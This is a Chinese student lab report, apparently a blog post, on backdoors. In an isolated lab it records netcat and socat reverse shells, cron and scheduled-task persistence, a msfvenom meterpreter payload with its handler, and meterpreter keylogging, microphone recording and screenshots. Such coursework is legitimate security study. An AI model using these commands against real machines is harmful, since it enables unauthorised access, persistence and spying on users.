一、基础问题问答

1、例举你能想到的一个后门进入到你系统中的可能方式?

答:可能会存在别人在我不在的时候利用优盘手动存放在我的电脑里面。我不慎点击一个链接,自动下载很多流氓软件,后门夹杂在其中。

2、例举你知道的后门如何启动起来(win及linux)的方式?

答:windows:通过用户直接点击后门程序exe以管理员身份来启动,或系统计划任务通过触发器,让事件触发启动后门。
linux:设置定时任务自动启动后门。

3、Meterpreter有哪些给你映像深刻的功能?

答:他可以生成任意形式的shellcode,而且操作很简便,一行代码就可以解决。

4、如何发现自己有系统有没有被安装后门?

答:通过杀毒软件去检查搜索本电脑的安全性。在此之前查看可信任列表有无自己陌生的软件。通过资源管理器观察有哪些进程在占用资源,寻找有无后门软件。

二、实验总结与体会

本次实验通过kali对windows的shell调用,windows对kali的shell调用,我了解到了后门的危害,以及后门操作的基本原理。我学会了简单的后门攻击,这令我很激动,我感觉自己可以动手去攻击他人的电脑了。在本次实验之后,我也学会了简单的保护我自己的电脑,以防自己受到后门攻击。

三、实践过程记录

1.环境准备

首先查询主机和kali虚拟机的ip地址

本主机ip地址:192.168.1.100
虚拟机ip地址:192.168.113.130

ncat

ncat即Netcat。Netcat用于从TCP/UDP连接中读取或发送网络数据。ncat可用来做端口扫描,端口转发,连接远程系统等
参数解释:
-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息
-vv:显示端口更详细的信息 

socat

socat可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。
功能​:端口转发​、​端口映射​、​端口监听、​tcp/udp连接​、​文件传送​、​nat映射​、使用openssl加密传输​

Meterpreter

Meterpreter号称“黑客瑞士军刀”,首先他有五大模块功能:渗透攻击(Exploit)、攻击载荷(Payload)、Shellcode、模块(Module)、监听器(Listener),功能强大

2.使用netcat获取主机操作Shell,cron启动

2.1 Windows获取Linux Shell

首先在Windows端启动ncat监听1203(我的学号)端口
ncat -l -p 1203
再在Linux虚拟机连接Windows,
HOST:192.168.1.100 端口PORT:1203
netcat 192.168.1.100 1203 -e /bin/sh

-e 选项执行shell程序

win端成功进入Linux Shell运行pwd指令

2.2 Linux获取Windows Shell

首先在Linux端启动ncat监听1203(我的学号)端口
nc -l -p 1203
再在Windows连接Linux,
HOST:192.168.113.130 端口PORT:2211
ncat.exe -e cmd.exe 192.168.113.130 1203

Linux成功获得Windows cmd,运行dir

3. 使用socat获取主机操作Shell, 任务计划启动

3.1 Windows获取Linux Shell

crontab -e

-Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
-crontab指令增加一条定时任务
-e表示编辑
-输入2表示选择vim编辑器
crontab命令选项:
-u指定一个用户
-l列出某个用户的任务计划
-r删除某个用户的任务(不添加用户即删除所有的任务)
-e编辑某个用户的任务

cron文件语法:
分     小时    日       月       星期     命令

0-59   0-23   1-31   1-12     0-6     command     (取值范围,0表示周日一般一行对应一个任务)

Minute  Hour   Day    Month   Dayofweek   command
分钟      小时      天     月        天每星期       命令

将####52 * * * * /bin/netcat 192.168.1。100 1203 -e /bin/sh写入

在cmd中监听1203端口,等待kali机中定时反向连接的启动

ncat -l -p 1203

等待任务启动后,cmd成功获得Linux shell,运行ls

3.2 Linux获取Windows Shell

win+R 输入compmgmt.msc

创建任务计划程序

新建任务的操作,操作为启动socat.exe 添加参数:tcp-listen:1203 exec:cmd.exe,pty,stderr

新建触发器,按预定时间启动任务

在kali中监听

socat - tcp:192.168.1.100:1203

4.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上用MSF meterpreter生成后门可执行程序20201203_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.130 LPORT=1203 -f exe > 20201203_backdoor.exe

-LHOST为反弹回连的IP,在这里是要Windows主动连接kali,即反弹给Kali,也就是Kali的IP:192.168.113.130
-LPORT是回连端口
-p 使用payload。
-payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
-f 生成文件的类型
-> 输出文件名

在Windows上监听1203端口等待接收可执行文件20201203_backdoor.exe

ncat.exe -lv 1203 >20201203_backdoor.exe

在Kali上将生成的20201203_backdoor.exe传送给Windows

ncat 192.168.1.100 1203 < 20201203_backdoor.exe

配置监听模块

在Kali上用`msfconsole`进入msf控制台
use exploit/multi/handler  #使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
set LHOST 192.168.113.130  #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1203
exploit

5.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

本题前面操作与3.3类似,即通过Windows运行后门程序,kali在msf控制台监听来获得Windows Shell
配置与上述相同:

获取麦克风音频   record_mic
获取击键记录   开始获取:keyscan_start  结束获取:keyscan_dump
获取主机屏幕图像    screenshot

四、遇到的问题以及解决

在windows自启任务时,我在学习了负责人的实验报告后,没有将参数添加,导致了我的失败。我尝试了很久都不能使后门软件启动,在查询了其他的资料之后,我添加了关于端口信息的参数。还犯了一个很傻的错误,我没有经过思考,在kali中设置自启任务的时候,把负责人的时间给填上去了,等了22分钟,软件没有启动,于是我还自作聪明的将时间改为1,结果又开始傻傻的等,结果一查资料才发现是每小时的第几分钟运行,以虚拟机为准。

posted on 2023-03-23 23:34  朴伤色  阅读(62)  评论(0编辑  收藏  举报